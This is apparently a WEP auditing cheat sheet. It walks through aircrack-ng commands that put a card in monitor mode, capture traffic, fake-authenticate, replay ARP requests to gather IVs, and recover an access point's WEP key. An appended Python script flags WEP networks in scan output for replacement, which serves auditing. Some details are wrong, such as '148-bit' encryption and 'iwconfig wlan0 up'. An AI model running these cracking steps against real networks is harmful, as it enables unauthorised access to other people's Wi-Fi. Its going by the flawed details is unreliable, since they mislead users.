WEP Auditing Cheat Sheet.doc

WEP Auditing cheat sheet
1) Boot into Kali Linux (or the Linux distro of choice that has the aircrack-ng suite installed)
2) Open a terminal window and make sure you are logged in as “root” (# prompt)
3) Type in “iwconfig” to display your network adapters
a. If the adapter is not up, bring it up with “iwconfig wlan0 up”. This assumes that wlan0 is a compatible
wireless card that supports packet injection; use the interface name that corresponds to the correct wireless
adapter. Tip: I record all the MAC addresses of my network cards for easy identification and
configuration.
b. Record your MAC address ________________________________
4) Scan for the access point: “iwlist wlan0 scan”
a. Record the following:
- MAC address of target AP _______________________________
- Channel the AP operates on _____
- Encryption and authentication types _______________
- ESSID ____________________________
5) Put the card in monitor mode. First check for conflicting processes: “airmon-ng check”
a. If it lists processes that interfere, stop them with “airmon-ng check kill”.
b. Type “airmon-ng start wlan0”
c. This should create a new interface called “mon0”. If it creates a differently named interface, use that name
in place of mon0 in all the following commands.
6) List the networks that are in range by typing “airodump-ng mon0”, and compare the output with what you recorded in step 4.
7) Open a new terminal window and make sure you are logged in as “root” (# prompt)
8) Start logging packets: “airodump-ng --channel 6 -w WEPlab --bssid xx:xx:xx:xx:xx:xx mon0”
a. Substitute the channel for the one you recorded in step 4.
b. -w specifies the prefix of the capture files the packets are written to. You can call this anything.
c. Substitute the BSSID with the MAC address of the AP.
9) Open a new terminal window and make sure you are logged in as “root” (# prompt)
10) Complete a fake authentication to the AP: “aireplay-ng -1 0 -e [ESSID] -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx mon0”
a. -1 is the fake authentication mode
b. 0 is the transmission time
c. -e is the SSID of the AP
d. -a is the MAC address of the AP
e. -h is the MAC address of your card (wlan0)
f. mon0 is the interface we are using
11) It should say “Authentication Successful”
12) Now generate IVs; we will need 250,000 for 64-bit encryption and 1,500,000 for 148-bit: “aireplay-ng -3 -b
xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx mon0”
a. -3 is the ARP request replay mode, which generates new IVs.
b. -b is the MAC address of the AP
c. -h is your MAC address
d. mon0 is the interface
13) After collecting enough packets we can now recover the WEP key (the “password”): “aircrack-ng -b xx:xx:xx:xx:xx:xx
WEPlab*.cap”
a. Remember that -b is the MAC of the AP
b. Use the same filename prefix as in step 8 and add “*.cap” so that all the capture files are used.
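Step 4 has you read the encryption type of each network off the “iwlist wlan0 scan” output by hand. The script below is an added example, not part of the original cheat sheet: it parses that output and lists which of your access points still run WEP, so they can be scheduled for replacement with WPA2/WPA3. The scan text is constructed, not captured, and the classification rests on one assumption: a cell showing “Encryption key:on” with no WPA/RSN information element is treated as WEP.

```python
"""Classify access points from `iwlist <iface> scan` output and flag WEP.

Added example (not part of the original cheat sheet). The sample output
below is constructed, not captured from a real scan. Assumption: a cell
with "Encryption key:on" and no WPA/802.11i (RSN) IE is a WEP network.
"""
import re

# Constructed sample of `iwlist wlan0 scan` output (MACs and ESSIDs are made up).
SAMPLE_SCAN = """\
wlan0     Scan completed :
          Cell 01 - Address: 00:11:22:AA:BB:01
                    Channel:6
                    Quality=60/70  Signal level=-50 dBm
                    Encryption key:on
                    ESSID:"WEPlab"
                    Mode:Master
          Cell 02 - Address: 00:11:22:AA:BB:02
                    Channel:11
                    Quality=45/70  Signal level=-65 dBm
                    Encryption key:on
                    ESSID:"office-wpa2"
                    Mode:Master
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
                        Pairwise Ciphers (1) : CCMP
                        Authentication Suites (1) : PSK
          Cell 03 - Address: 00:11:22:AA:BB:03
                    Channel:1
                    Quality=30/70  Signal level=-75 dBm
                    Encryption key:off
                    ESSID:"guest-open"
                    Mode:Master
"""

# Each cell starts with "Cell NN - Address: <MAC>"; the MAC is captured.
CELL_RE = re.compile(r"^\s*Cell \d+ - Address: ([0-9A-Fa-f:]{17})", re.M)


def parse_iwlist(text):
    """Return one dict per cell: bssid, essid, channel, security."""
    aps = []
    # re.split with a capture group yields [preamble, mac1, body1, mac2, body2, ...]
    parts = CELL_RE.split(text)
    for i in range(1, len(parts), 2):
        bssid, body = parts[i].upper(), parts[i + 1]
        essid_m = re.search(r'ESSID:"(.*?)"', body)
        chan_m = re.search(r"Channel:(\d+)", body)
        enc_on = re.search(r"Encryption key:on", body) is not None
        has_rsn = re.search(r"IE:.*(WPA|802\.11i)", body) is not None
        if not enc_on:
            security = "OPEN"
        elif has_rsn:
            security = "WPA/WPA2"
        else:
            security = "WEP"  # assumption: encryption on but no WPA/RSN IE
        aps.append({
            "bssid": bssid,
            "essid": essid_m.group(1) if essid_m else "",
            "channel": int(chan_m.group(1)) if chan_m else None,
            "security": security,
        })
    return aps


def wep_networks(text):
    """Only the cells classified as WEP, i.e. the ones to retire."""
    return [ap for ap in parse_iwlist(text) if ap["security"] == "WEP"]


if __name__ == "__main__":
    for ap in parse_iwlist(SAMPLE_SCAN):
        flag = "  <-- retire: WEP" if ap["security"] == "WEP" else ""
        print(f'{ap["bssid"]}  ch{ap["channel"]:>2}  {ap["security"]:<8} {ap["essid"]}{flag}')
```

To run it against a live scan, pipe the real output in place of SAMPLE_SCAN (for example by reading it from a file saved with “iwlist wlan0 scan > scan.txt”). The WEP heuristic errs on the side of flagging: a driver that omits the IE lines would make a WPA network look like WEP, which is the safer direction for an audit.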